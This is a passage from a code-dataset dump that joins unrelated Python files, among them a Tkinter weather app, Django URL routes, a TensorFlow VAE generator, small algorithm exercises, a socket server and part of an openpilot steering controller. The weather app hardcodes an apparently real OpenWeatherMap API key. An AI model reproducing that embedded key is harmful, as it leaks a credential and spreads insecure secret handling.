rt\r\nimport tkinter as tk\r\nfrom tkinter import messagebox\r\nimport colour\r\n\r\n#https://api.openweathermap.org/data/2.5/weather?q=Delhi,In&appid=2ba176b6779095cdadce08734e517654\r\n\r\nclass connection:\r\n def __init__(self):\r\n return None\r\n\r\n def responsecheck(self,link):\r\n self.response = rt.get(link)\r\n if self.response.status_code == 401:\r\n return \"Error 401\"\r\n else:\r\n self.jsondata = self.response.json()\r\n return self.jsondata\r\n\r\nclass graphical:\r\n def __init__(self,twindow):\r\n self.twindow = twindow\r\n self.link = \"https://api.openweathermap.org/data/2.5/weather?q={}&appid=2ba176b6779095cdadce08734e517654\"\r\n self.country = tk.Label(twindow,text=\"Country:- \",bg='#0066cc',fg='white',font=(\"Times\", \"16\", \"bold\"),padx=30)\r\n self.countrytext = tk.Label(twindow,text=\"NIL\",bg='#0099ff',fg='white',font=(\"Times\", \"16\", \"bold\"),padx=20)\r\n self.country.grid(row=1,column=0,sticky=tk.W)\r\n self.countrytext.grid(row=1,column=1,sticky=tk.E)\r\n\r\n self.location = tk.Label(twindow,text=\"Location:- \",bg='#0066cc',fg='white',font=(\"Times\", \"16\", \"bold\"),padx=26.5)\r\n self.locationtext = tk.Label(twindow,text=\"NIL\",bg='#0099ff',fg='white',font=(\"Times\", \"16\", \"bold\"),padx=24)\r\n self.location.grid(row=2,column=0,sticky=tk.W)\r\n self.locationtext.grid(row=2,column=1,sticky=tk.E)\r\n\r\n self.degree = tk.Label(twindow,text=\"Degree:- \",bg='#0066cc',fg='white',font=(\"Times\", \"16\", \"bold\"),padx=35)\r\n self.degreetext = tk.Label(twindow,text=\"NIL\",bg='#0099ff',fg='white',font=(\"Times\", \"16\", \"bold\"),padx=20)\r\n self.degree.grid(row=3,column=0,sticky=tk.W)\r\n self.degreetext.grid(row=3,column=1,sticky=tk.E)\r\n\r\n self.enterlocation = tk.Label(twindow,text=\"Enter location:- \",bg='#0066cc',fg='white',font=(\"Times\", \"16\", \"bold\"),padx=3)\r\n self.textbox = tk.Text(twindow,height=1,width=15)\r\n self.enterlocation.grid(row=4,column=0,sticky=tk.W)\r\n self.textbox.grid(row=4,column=1,sticky=tk.E)\r\n\r\n self.searchbutton = tk.Button(twindow,height=2,width=15,text=\"Search Location\",padx=20,command=self.locini)\r\n self.searchbutton.grid(row=5,column=1)\r\n\r\n self.tempcolorbar = tk.Button(twindow,height=2,width=15,text=\"Temp Bar\",command=self.temcolobar,padx=20)\r\n self.tempcolorbar.grid(row=5,column=0)\r\n\r\n def temcolobar(self):\r\n messagebox.showinfo(\"Temperature info\", \"Mainwindow Background shows the temperature color\")\r\n\r\n def locini(self):\r\n self.colorcode = \"\"\r\n self.tempvar = self.textbox.get('1.0',tk.END)\r\n self.templink = self.link.format(self.tempvar)\r\n self.obj = connection()\r\n self.data = self.obj.responsecheck(self.templink)\r\n\r\n print(self.data)\r\n if self.data == {'cod': '404', 'message': 'city not found'}:\r\n return None\r\n else:\r\n if int(self.data[\"main\"][\"temp\"])-273 < 0:\r\n self.twindow.configure(background=\"#3366cc\")\r\n elif int(self.data[\"main\"][\"temp\"])-273 > 0 and int(self.data[\"main\"][\"temp\"])-273 < 10:\r\n self.twindow.configure(background=\"#0099ff\")\r\n elif int(self.data[\"main\"][\"temp\"])-273 > 10 and int(self.data[\"main\"][\"temp\"])-273 < 20:\r\n self.twindow.configure(background=\"#99ccff\")\r\n elif int(self.data[\"main\"][\"temp\"])-273 > 20 and int(self.data[\"main\"][\"temp\"])-273 < 30:\r\n self.twindow.configure(background=\"#ffff66\")\r\n elif int(self.data[\"main\"][\"temp\"])-273 > 30 and int(self.data[\"main\"][\"temp\"])-273 < 40:\r\n self.twindow.configure(background=\"#ffff00\")\r\n elif int(self.data[\"main\"][\"temp\"])-273 > 40:\r\n self.twindow.configure(background=\"#cc9900\")\r\n self.degreetext = tk.Label(self.twindow,text=int(self.data[\"main\"][\"temp\"])-273,bg='#0099ff',fg='white',font=(\"Times\", \"16\", \"bold\"),padx=20)\r\n self.degreetext.grid(row=3,column=1,sticky=tk.E)\r\n\r\n self.countrytext = tk.Label(self.twindow,text=self.data[\"sys\"][\"country\"],bg='#0099ff',fg='white',font=(\"Times\", \"16\", \"bold\"),padx=20)\r\n self.countrytext.grid(row=1,column=1,sticky=tk.E)\r\n\r\n self.locationtext = tk.Label(self.twindow,text=self.data[\"name\"],bg='#0099ff',fg='white',font=(\"Times\", \"16\", \"bold\"),padx=24)\r\n self.locationtext.grid(row=2,column=1,sticky=tk.E)\r\n\r\nmain = tk.Tk()\r\nmain.geometry(\"310x250\")\r\nmain.resizable(0, 0)\r\nmain.title(\"Weather Application \")\r\ncolorcode = \"\"\r\nmain.configure(background='#0099ff')\r\ng = graphical(main)\r\ng.locini()\r\n\r\nmain.mainloop()","sub_path":"wheatherapp.py","file_name":"wheatherapp.py","file_ext":"py","file_size_in_byte":5079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"554198550","text":"\"\"\"ServeMed URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.11/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url\nfrom django.contrib import admin\nfrom django.conf.urls import include\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom hhands import views\n\nfrom hhands.views import index, ChartData, index_TIBar, BarChart\n\nurlpatterns = [\n url(r'^$',views.home, name='home'),\n url(r'^home',views.home, name='home'),\n url(r'^setup',views.setup, name='setup'),\n url(r'^customerlogin',views.customerlogin, name='customerlogin'),\n url(r'^physicians',views.physicians, name='physicians'),\n url(r'^dashboard',index_TIBar.as_view(), name='dashboard'),\n url(r'^index_TIBar',index.as_view(), name='index_TIBar'),\n url(r'^api/chart/data/$', ChartData.as_view()),\n url(r'^api/chart1/data/$', BarChart.as_view()),\n url(r'^checkout',views.CheckoutView.as_view(), name='checkout'),\n\n #url(r'^index_TIBar',views.index_TIBar, name='index_TIBar'),\n url(r'^data/Med',views.Med, name='Med'),\n url(r'^data/us',views.usdata, name='usdata'),\n url(r'^settings',views.customersettings, name='settings'),\n url(r'^enrollconfirmation',views.enrollconfirmation, name='enrollconfirmation'),\n url(r'^InformationSaved',views.InformationSaved, name='InformationSaved'),\n url(r'^HCPInfo',views.PhysicianInformation, name='PhysicianInformation'),\n url(r'^admin/', admin.site.urls),\n url(r'^base',views.base, name='base'),\n url(r'^hhands/',include('hhands.urls',namespace='hhands')),\n url(r'hhands/',include('django.contrib.auth.urls')),\n url(r'^test/$',views.testpage.as_view(), name='test'),\n url(r'^thanks/$',views.thankspage.as_view(), name='thanks'),\n\n url(r'^shop/',include('shop.urls')),\n url(r'^search/',include('search_app.urls')),\n url(r'^cart/',include('cart.urls')),\n url(r'^order/',include('order.urls')),\n\n]\n\nif settings.DEBUG:\n\turlpatterns += static(settings.STATIC_URL,document_root=settings.STATIC_ROOT)\n\turlpatterns += static(settings.MEDIA_URL,document_root=settings.MEDIA_ROOT)\n","sub_path":"ServeMed/ServeMed/urls_bak.py","file_name":"urls_bak.py","file_ext":"py","file_size_in_byte":2634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"166194349","text":"import tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\nimport os\n#from torch.autograd import Variable\nimport procesImages as input_data\nimport time\nimport sys, librosa, analyzer, dataParser\n\ninput_song = \"\"\ninput_time = 0\nif len(sys.argv) == 3:\n input_song = sys.argv[1]\n input_time = int(sys.argv[2])\n print(\"For analyzation: \" + input_song + \" at second \" + str(input_time))\nelse:\n print(\"Invalid num of arguments\")\n quit()\n\nmb_size = 20\nz_dim = 100\nX_dim = input_data.WIDTH * input_data.HEIGHT\ny_dim = 28\nh_dim = 128\nc = 0\nlr = 1e-3\n\n\ndef plot(samples):\n fig = plt.figure(figsize=(4, 4))\n gs = gridspec.GridSpec(4, 4)\n gs.update(wspace=0.05, hspace=0.05)\n\n for i, sample in enumerate(samples):\n ax = plt.subplot(gs[i])\n plt.axis('off')\n ax.set_xticklabels([])\n ax.set_yticklabels([])\n ax.set_aspect('equal')\n plt.imshow(sample.reshape(input_data.HEIGHT, input_data.WIDTH), cmap='Greys_r')\n\n return fig\n\n\ndef xavier_init(size):\n in_dim = size[0]\n xavier_stddev = 1. / tf.sqrt(in_dim / 2.)\n return tf.random_normal(shape=size, stddev=xavier_stddev)\n\n\n# =============================== Q(z|X) ======================================\n\nX = tf.placeholder(tf.float32, shape=[None, X_dim])\nc = tf.placeholder(tf.float32, shape=[None, y_dim])\nz = tf.placeholder(tf.float32, shape=[None, z_dim])\n\nQ_W1 = tf.Variable(xavier_init([X_dim + y_dim, h_dim]))\nQ_b1 = tf.Variable(tf.zeros(shape=[h_dim]))\n\nQ_W2_mu = tf.Variable(xavier_init([h_dim, z_dim]))\nQ_b2_mu = tf.Variable(tf.zeros(shape=[z_dim]))\n\nQ_W2_sigma = tf.Variable(xavier_init([h_dim, z_dim]))\nQ_b2_sigma = tf.Variable(tf.zeros(shape=[z_dim]))\n\n\ndef Q(X, c):\n inputs = tf.concat(axis=1, values=[X, c])\n h = tf.nn.relu(tf.matmul(inputs, Q_W1) + Q_b1)\n z_mu = tf.matmul(h, Q_W2_mu) + Q_b2_mu\n z_logvar = tf.matmul(h, Q_W2_sigma) + Q_b2_sigma\n return z_mu, z_logvar\n\n\ndef sample_z(mu, log_var):\n eps = tf.random_normal(shape=tf.shape(mu))\n return mu + tf.exp(log_var / 2) * eps\n\n\n# =============================== P(X|z) ======================================\n\nP_W1 = tf.Variable(xavier_init([z_dim + y_dim, h_dim]))\nP_b1 = tf.Variable(tf.zeros(shape=[h_dim]))\n\nP_W2 = tf.Variable(xavier_init([h_dim, X_dim]))\nP_b2 = tf.Variable(tf.zeros(shape=[X_dim]))\n\n\ndef P(z, c):\n inputs = tf.concat(axis=1, values=[z, c])\n h = tf.nn.relu(tf.matmul(inputs, P_W1) + P_b1)\n logits = tf.matmul(h, P_W2) + P_b2\n prob = tf.nn.sigmoid(logits)\n return prob, logits\n\n\n# =============================== TRAINING ====================================\n\"\"\"\nz_mu, z_logvar = Q(X, c)\nz_sample = sample_z(z_mu, z_logvar)\n_, logits = P(z_sample, c)\n\"\"\"\n# Sampling from random z\nX_samples, _ = P(z, c)\n\n\"\"\"\n# E[log P(X|z)]\nrecon_loss = tf.reduce_sum(tf.nn.sigmoid_cross_entropy_with_logits(logits=logits, labels=X), 1)\n# D_KL(Q(z|X) || P(z|X)); calculate in closed form as both dist. are Gaussian\nkl_loss = 0.5 * tf.reduce_sum(tf.exp(z_logvar) + z_mu**2 - 1. - z_logvar, 1)\n# VAE loss\nvae_loss = tf.reduce_mean(recon_loss + kl_loss)\n\nsolver = tf.train.AdamOptimizer().minimize(vae_loss)\nsummary = tf.summary.scalar('VAE_loss', vae_loss)\n\"\"\"\n\n#data = np.load(\"..\\\\data_S.npy\")\n\nwith tf.Session() as sess:\n# merge = tf.summary.merge([summary])\n# train_writer = tf.summary.FileWriter('\\\\tmp\\\\train_vae\\\\1', sess.graph)\n sess.run(tf.global_variables_initializer())\n\n saver = tf.train.Saver()\n saver.restore(sess, '\\\\tmp\\\\model\\\\cvae_model3.ckpt')\n\n if not os.path.exists('outV/'):\n os.makedirs('outV/')\n\n i = 0\n\n batch = []\n for i in range(16):\n print('Scaning ' + input_song + \" \" + str(i))\n try:\n song, sr = librosa.load(input_song, offset = input_time + i, duration = 25, sr = 22050)\n except:\n raise ValueError(\"Something wrong with load of \" + input_song)\n\n song_np = analyzer.analyzeLoadedSong(song, sr)\n song_np = dataParser.normalizeSong(\"..\\\\mini_data_S_notNorm.npy\", song_np)\n batch.append(song_np)\n\n samples = sess.run(X_samples,\n feed_dict={z: np.random.randn(16, z_dim), c: batch})\n\n fig = plot(samples)\n\n name = time.strftime('%d_%m_%Y_%H_%M_%S')\n name = \"outV/\" + name + \".png\"\n plt.savefig(name, bbox_inches='tight')\n i += 1\n plt.close(fig)\n","sub_path":"gan/generator_vae.py","file_name":"generator_vae.py","file_ext":"py","file_size_in_byte":4387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"365683502","text":"import sys\nimport os.path\n\n# Remove paths from sys.path that don't fall within our\n# app binary, except if they are system paths;\n# this is intended to provide isolation from user python\n# packages.\n\nnewpath = []\nbase_path = os.path.dirname(__file__)\nfor p in sys.path:\n if( p.startswith(base_path) or\n p.startswith('/System/Library/') or\n p.startswith('/usr/lib') ):\n \tnewpath.append(p)\nsys.path = newpath\n","sub_path":"src/steamshovel/resources/Steamshovelapp/Contents/Frameworks/usercustomize.py","file_name":"usercustomize.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"294333404","text":"class Solution(object):\n def exist(self, board, word):\n \"\"\"\n :type board: List[List[str]]\n :type word: str\n :rtype: bool\n \"\"\"\n if board is None or word is None or len(board) < 1 or len(board[0]) < 1:\n return False\n isVisited = [[False for i in range(len(board[0]))] for j in range(len(board))]\n for i in range(len(board)):\n for j in range(len(board[0])):\n if self.dfs(board, i, j, word, 0, isVisited):\n return True\n return False\n \n def dfs(self, board, i, j, word, cursor, isVisited):\n \"\"\"\n dfs word from point (i,j)\n \"\"\"\n if i < 0 or i > len(board)-1 or j < 0 or j > len(board[0])-1 or isVisited[i][j] or board[i][j] != word[cursor]:\n return False\n if cursor == len(word) - 1:\n return True\n isVisited[i][j] = True\n flag = self.dfs(board, i-1, j, word, cursor+1, isVisited) or self.dfs(board, i+1, j, word, cursor+1, isVisited) or self.dfs(board, i, j-1, word, cursor+1, isVisited) or self.dfs(board, i, j+1, word, cursor+1, isVisited)\n isVisited[i][j] = False\n return flag\n","sub_path":"Python/WordSearch.py","file_name":"WordSearch.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"626671558","text":"import socket\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nhost = socket.gethostname() \nport = 12345 \ns.bind((host, port)) \ns.listen(5)\n\nwhile True :\n c, addr = s.accept() \n print(addr)\n\n planes = [\"26.8022\", \"30.8888\",\n \t\t\t \"25.8022\", \"35.8888\",\n \t\t\t \"23.8022\", \"33.8888\"]\n c.send(bytes(str(len(planes)), 'utf-8'))\n for plane in planes:\n \tc.send(bytes(plane, 'utf-8'))\n c.close()\n","sub_path":"server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"107363972","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.model_selection import cross_val_score, GridSearchCV, train_test_split\nplt.style.use(style='ggplot')\nplt.rcParams['figure.figsize'] = (10, 6)\ntrain_test_split_1 = pd.read_csv('./glass.csv')\ntrain_df, test_df = train_test_split(train_test_split_1, test_size=0.5, random_state=0)\n\nX_train = train_df.drop(\"Type\",axis=1)\nY_train = train_df[\"Type\"]\nmodel = GaussianNB()\nmodel.fit(X_train, Y_train)\nX_test = test_df.drop(\"Type\",axis=1).copy()\nY_test = model.predict(X_test)\nacc_svc = round(model.score(X_train, Y_train) * 100, 2)\nprint(\"NB accuracy is:\", acc_svc)\n\nplt.hist(Y_train,color='blue')\nplt.xlabel('Type')\nplt.ylabel('Count')\nplt.title('BN Model')\nplt.show()\nplt.scatter(Y_test, test_df[\"Type\"], alpha=.75,\n color='b') #alpha helps to show overlapping data\nplt.xlabel('Predicted Price')\nplt.ylabel('Actual Price')\nplt.title('BN Model')\nplt.show()","sub_path":"ICP/ICP4/NaïveBayes.py","file_name":"NaïveBayes.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"138417582","text":"# ------ Controller ------ #\n#\n#\n# functions to run to handle user imput\n#\n\n# ------ Import Libraries and Modules ------ #\nimport pygame,random,math\nfrom ..Assets import vars\nfrom ..Assets import settings\nimport babelLib as general\nimport GameData.Scripts.blocks as blocks\nimport GameData.Scripts.workers as workers\n\nclass Controller():\n \"\"\"\n Class object that handles all player input and subsequent actions.\n \"\"\"\n def __init__(self,pathList):\n self.openWindow = True # exit program flag\n self.keys = None # holds pressed keys\n \n self.container = None\n\n self.pathList = pathList # temporary\n\n def addContainer(self,container): # add container object\n self.container = container\n\n def update(self):\n \"\"\"\n Every frame this will iterate over all user input events and decide what to do with each one. Can either use get_pressed() or event.get(). Not sure which is better, if only one should be used, or if both is fine\n \"\"\"\n \n \"\"\"\n Begin with state system where we look at states of keys. This method has the advantage of greater precision for timing and low latency but if the loop doesnt run right as you press the button you may miss a command. Use this for things like scrolling where it isnt as important if a single event is missed.\n \"\"\"\n # --- Scrolling\n self.keys = pygame.key.get_pressed()\n if self.keys[pygame.K_LEFT] or self.keys[pygame.K_a]:\n if self.container.worldGrid.left_edgeIndex > 0: # respect bounds of worldGrid\n self.container.worldGrid.scroll(settings.control_ScrollSpeed,0)\n if self.keys[pygame.K_RIGHT] or self.keys[pygame.K_d]:\n if self.container.worldGrid.right_edgeIndex < self.container.worldGrid.gridX: # respect bounds of worldGrid\n self.container.worldGrid.scroll(-1*settings.control_ScrollSpeed,0)\n if self.keys[pygame.K_UP] or self.keys[pygame.K_w]:\n if self.container.worldGrid.top_edgeIndex > 0: # respect bounds of worldGrid\n self.container.worldGrid.scroll(0,settings.control_ScrollSpeed)\n if self.keys[pygame.K_DOWN] or self.keys[pygame.K_s]:\n if self.container.worldGrid.bottom_edgeIndex < self.container.worldGrid.gridY: # respect bounds of worldGrid\n self.container.worldGrid.scroll(0,-1*settings.control_ScrollSpeed)\n\n # --- Creating new blocks\n if pygame.mouse.get_pressed()[2]: # right click held down\n self.container.worldGrid.new_Block(self.container.worldGrid.get_Index(pygame.mouse.get_pos()),onScreen=True)\n \n \"\"\"\n Next do the event system. This has a higher latency but wont miss any inputs if they are made when the control loop isn't running. Use this for slower things like selecting where timing precision isnt as important but action completion is.\n \"\"\"\n for event in pygame.event.get():\n # --- quit game\n if event.type == pygame.QUIT: # If user clicked close\n self.openWindow = False # Flag that we are done so the program closes\n\n # --- key down events\n if event.type == pygame.KEYDOWN:\n #print event\n if event.unicode == u'=': self.container.worldGrid.zoom(\"In\")\n if event.unicode == u'-': self.container.worldGrid.zoom(\"Out\")\n \n # ------ Testing Controls ------ #\n \n # --- pathfinding\n# elif event.type == pygame.MOUSEBUTTONUP: # mouse button released\n# if event.button == 1: # left click\n# self.container.pathFinder.update(event.pos,self.container.block_Sprites)\n","sub_path":"GameData/Scripts/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":3742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"46062503","text":"# BF算法 蛮力法解决字符串匹配问题\n# 获取输入\nprint(\"This is a BF algorithm\")\nmainStr = input(\"Please enter a main string:\")\nsubStr = input(\"Please enter a matched string:\")\n# 求长度\nn = len(mainStr)\nm = len(subStr)\n# 判断字符串是否有效\nif(m > n):\n print(\"The main string should larger than matched string!\")\nelse:\n i = 0 # 主串浮动指针\n j = 0 # 子串浮动指针\n while(i < (n-m+1)): # 当主串指针已经到n-m+1时,肯定无法匹配\n while(j < m): # 子串的指针不超过其长度m\n if(mainStr[i] != subStr[j]): # 如果对应字符不相等,则跳出内循环\n i=i-j+1########################\n j=0\n break\n else: # 如果相等,继续比较\n i = i+1\n j = j+1\n if(j == m): # 跳出内循环后测试是否已经完成了匹配\n print(\"The string are matched in \"+str(i-m+1)+\"character\")\n if(i >= (n-m+1) and j != m): # 测��当i全部尝试匹配时,j是否没有完成匹配\n print(\"The string didn't match.\")\n\n","sub_path":"lab1/BF.py","file_name":"BF.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"425392666","text":"from cereal import car, log\nfrom selfdrive.car import apply_std_steer_torque_limits\nfrom selfdrive.car.hyundai.hyundaican import create_lkas11, create_clu11, create_lfa_mfa, create_mdps12, create_ems11\nfrom selfdrive.car.hyundai.values import Buttons, SteerLimitParams, CAR\nfrom opendbc.can.packer import CANPacker\nfrom selfdrive.config import Conversions as CV\nfrom common.numpy_fast import interp\n\n# speed controller\nfrom selfdrive.car.hyundai.spdcontroller import SpdController\nfrom selfdrive.car.hyundai.spdctrlSlow import SpdctrlSlow\nfrom selfdrive.car.hyundai.spdctrlNormal import SpdctrlNormal\n\nfrom common.params import Params\nimport common.log as trace1\nimport common.CTime1000 as tm\n\nVisualAlert = car.CarControl.HUDControl.VisualAlert\nLaneChangeState = log.PathPlan.LaneChangeState\n\n\nclass CarController():\n def __init__(self, dbc_name, CP, VM):\n self.CP = CP\n self.apply_steer_last = 0\n self.car_fingerprint = CP.carFingerprint\n self.packer = CANPacker(dbc_name)\n self.steer_rate_limited = False\n self.resume_cnt = 0\n self.lkas11_cnt = 0\n self.last_resume_frame = 0\n self.last_lead_distance = 0\n self.longcontrol = CP.openpilotLongitudinalControl\n\n\n\n self.nBlinker = 0\n self.lane_change_torque_lower = 0\n self.steer_torque_over_timer = 0\n self.steer_torque_ratio = 1\n self.steer_torque_ratio_dir = 1\n\n self.dRel = 0\n self.yRel = 0\n self.vRel = 0\n\n self.timer1 = tm.CTime1000(\"time\")\n self.model_speed = 0\n self.model_sum = 0\n \n # hud\n self.hud_timer_left = 0\n self.hud_timer_right = 0\n\n\n self.command_cnt = 0\n self.command_load = 0\n self.params = Params()\n\n # param\n self.param_preOpkrAccelProfile = -1\n self.param_OpkrAccelProfile = 0\n self.param_OpkrAutoResume = 0\n self.param_OpkrWhoisDriver = 0\n\n self.SC = None\n self.traceCC = trace1.Loger(\"CarController\")\n\n\n\n def limit_ctrl(self, value, limit, offset ):\n p_limit = offset + limit\n m_limit = offset - limit\n if value > p_limit:\n value = p_limit\n elif value < m_limit:\n value = m_limit\n return value\n\n\n def process_hud_alert(self, enabled, CC ):\n visual_alert = CC.hudControl.visualAlert\n left_lane = CC.hudControl.leftLaneVisible\n right_lane = CC.hudControl.rightLaneVisible\n\n sys_warning = (visual_alert == VisualAlert.steerRequired)\n\n if left_lane:\n self.hud_timer_left = 100\n\n if right_lane:\n self.hud_timer_right = 100\n\n if self.hud_timer_left:\n self.hud_timer_left -= 1\n \n if self.hud_timer_right:\n self.hud_timer_right -= 1\n\n\n # initialize to no line visible\n sys_state = 1\n if self.hud_timer_left and self.hud_timer_right or sys_warning: # HUD alert only display when LKAS status is active\n if (self.steer_torque_ratio > 0.7) and (enabled or sys_warning):\n sys_state = 3\n else:\n sys_state = 4\n elif self.hud_timer_left:\n sys_state = 5\n elif self.hud_timer_right:\n sys_state = 6\n\n return sys_warning, sys_state\n\n\n def cV_tune( self, v_ego, cv_value ): # cV(곡률에 의한 변화)\n self.sRKPHV = self.CP.lateralPIDatom.sRKPHV\n self.cVBPV = self.CP.lateralCVatom.cvBPV\n self.cvSteerMaxV1 = self.CP.lateralCVatom.cvSteerMaxV1\n self.cvSteerDeltaUpV1 = self.CP.lateralCVatom.cvSteerDeltaUpV1\n self.cvSteerDeltaDnV1 = self.CP.lateralCVatom.cvSteerDeltaDnV1\n self.cvSteerMaxV2 = self.CP.lateralCVatom.cvSteerMaxV2\n self.cvSteerDeltaUpV2 = self.CP.lateralCVatom.cvSteerDeltaUpV2\n self.cvSteerDeltaDnV2 = self.CP.lateralCVatom.cvSteerDeltaDnV2 \n\n cv_BPV = self.cVBPV # 곡률\n # Max\n self.steerMax1 = interp( cv_value, cv_BPV, self.cvSteerMaxV1 )\n self.steerMax2 = interp( cv_value, cv_BPV, self.cvSteerMaxV2 )\n self.steerMaxV = [ float(self.steerMax1), float(self.steerMax2) ]\n self.MAX = interp( v_ego, self.sRKPHV, self.steerMaxV ) \n\n # Up\n self.steerUP1 = interp( cv_value, cv_BPV, self.cvSteerDeltaUpV1 )\n self.steerUP2 = interp( cv_value, cv_BPV, self.cvSteerDeltaUpV2 )\n self.steerUPV = [ float(self.steerUP1), float(self.steerUP2) ]\n self.UP = interp( v_ego, self.sRKPHV, self.steerUPV )\n\n # dn\n self.steerDN1 = interp( cv_value, cv_BPV, self.cvSteerDeltaDnV1 )\n self.steerDN2 = interp( cv_value, cv_BPV, self.cvSteerDeltaDnV2 ) \n self.steerDNV = [ float(self.steerDN1), float(self.steerDN2) ]\n self.DN = interp( v_ego, self.sRKPHV, self.steerDNV )\n\n\n\n def steerParams_torque(self, CS, abs_angle_steers, path_plan, CC ):\n param = SteerLimitParams()\n v_ego_kph = CS.out.vEgo * CV.MS_TO_KPH\n\n self.cV_tune( CS.out.vEgo, self.model_speed )\n param.STEER_MAX = min( param.STEER_MAX, self.MAX)\n param.STEER_DELTA_UP = min( param.STEER_DELTA_UP, self.UP)\n param.STEER_DELTA_DOWN = min( param.STEER_DELTA_DOWN, self.DN )\n\n\n # streer over check\n if v_ego_kph > 5 and abs( CS.out.steeringTorque ) > 510: #사용자 핸들 토크\n self.steer_torque_over_timer = 1\n else:\n self.steer_torque_over_timer = 0\n\n\n if CS.out.leftBlinker or CS.out.rightBlinker:\n self.nBlinker += 1\n elif self.nBlinker:\n self.nBlinker = 0\n\n # 차선이 없고 앞차량이 없으면.\n steer_angle_lower = self.dRel > 20 and (not CC.hudControl.leftLaneVisible and not CC.hudControl.rightLaneVisible)\n\n if v_ego_kph < 1:\n self.steer_torque_over_timer = 0\n self.steer_torque_ratio_dir = 1\n elif path_plan.laneChangeState != LaneChangeState.off:\n self.steer_torque_ratio_dir = 1\n self.steer_torque_over_timer = 0\n self.nBlinker = 0\n elif self.steer_torque_over_timer: #or CS.out.steerWarning:\n self.steer_torque_ratio_dir = -1\n elif steer_angle_lower:\n param.STEER_MAX *= 0.8\n param.STEER_DELTA_UP = 2\n param.STEER_DELTA_DOWN = 4\n self.steer_torque_ratio_dir = 1 \n else:\n self.steer_torque_ratio_dir = 1\n\n lane_change_torque_lower = 0\n if self.nBlinker > 10 and v_ego_kph > 1:\n lane_change_torque_lower = int(CS.out.leftBlinker) + int(CS.out.rightBlinker) * 2\n if CS.out.steeringPressed and self.param_OpkrWhoisDriver:\n self.steer_torque_ratio = 0.05 \n\n self.lane_change_torque_lower = lane_change_torque_lower\n\n # smoth torque enable or disable\n ratio_pval = 0.001 # 10 sec\n ratio_mval = 0.001 # 10 sec\n if self.param_OpkrWhoisDriver == 1: # 높음\n ratio_pval = 0.005 # 2 sec\n ratio_mval = 0.005 # 0.5 sec\n if self.param_OpkrWhoisDriver == 2: # 중간\n ratio_pval = 0.002 # 5 sec \n ratio_mval = 0.002 # 0.5 sec \n else: # 낮음.\n ratio_pval = 0.001 # 10 sec \n ratio_mval = 0.001 # 0.5 sec \n\n if self.param_OpkrWhoisDriver == 0:\n self.steer_torque_ratio = 1\n elif self.steer_torque_ratio_dir >= 1:\n if self.steer_torque_ratio < 1:\n self.steer_torque_ratio += ratio_pval \n elif self.steer_torque_ratio_dir <= -1:\n if self.steer_torque_ratio > 0:\n self.steer_torque_ratio -= ratio_mval \n\n if self.steer_torque_ratio < 0:\n self.steer_torque_ratio = 0\n elif self.steer_torque_ratio > 1:\n self.steer_torque_ratio = 1\n\n #print( 'self.steer_torque_ratio={} {}{} self.param_OpkrWhoisDriver={}'.format( self.steer_torque_ratio, ratio_mval, ratio_pval, self.param_OpkrWhoisDriver ) )\n\n return param\n\n def param_load(self ):\n self.command_cnt += 1\n if self.command_cnt > 100:\n self.command_cnt = 0\n\n if self.command_cnt % 10:\n return\n\n self.command_load += 1\n if self.command_load == 1:\n self.param_OpkrAccelProfile = int(self.params.get('OpkrAccelProfile')) \n elif self.command_load == 2:\n self.param_OpkrAutoResume = int(self.params.get('OpkrAutoResume'))\n elif self.command_load == 3:\n self.param_OpkrWhoisDriver = int(self.params.get('OpkrWhoisDriver'))\n else:\n self.command_load = 0\n\n # speed controller\n if self.param_preOpkrAccelProfile != self.param_OpkrAccelProfile:\n self.param_preOpkrAccelProfile = self.param_OpkrAccelProfile\n if self.param_OpkrAccelProfile == 1:\n self.SC = SpdctrlSlow()\n elif self.param_OpkrAccelProfile == 2:\n self.SC = SpdctrlNormal()\n else:\n self.SC = SpdctrlNormal() \n\n\n# CC:car.CarControl(car.capnp), CS:CarState CP:CarInterface.get_params\n def update(self, CC, CS, frame, sm, CP ):\n if self.CP != CP:\n self.CP = CP\n\n self.param_load()\n\n\n enabled = CC.enabled\n actuators = CC.actuators\n pcm_cancel_cmd = CC.cruiseControl.cancel\n\n\n path_plan = sm['pathPlan']\n\n abs_angle_steers = abs(actuators.steerAngle)\n\n self.dRel, self.yRel, self.vRel = SpdController.get_lead( sm )\n if self.SC is not None:\n self.model_speed, self.model_sum = self.SC.calc_va( sm, CS.out.vEgo )\n else:\n self.model_speed = self.model_sum = 0\n\n # Steering Torque\n param = self.steerParams_torque( CS, abs_angle_steers, path_plan, CC )\n\n\n new_steer = actuators.steer * param.STEER_MAX\n apply_steer = apply_std_steer_torque_limits(new_steer, 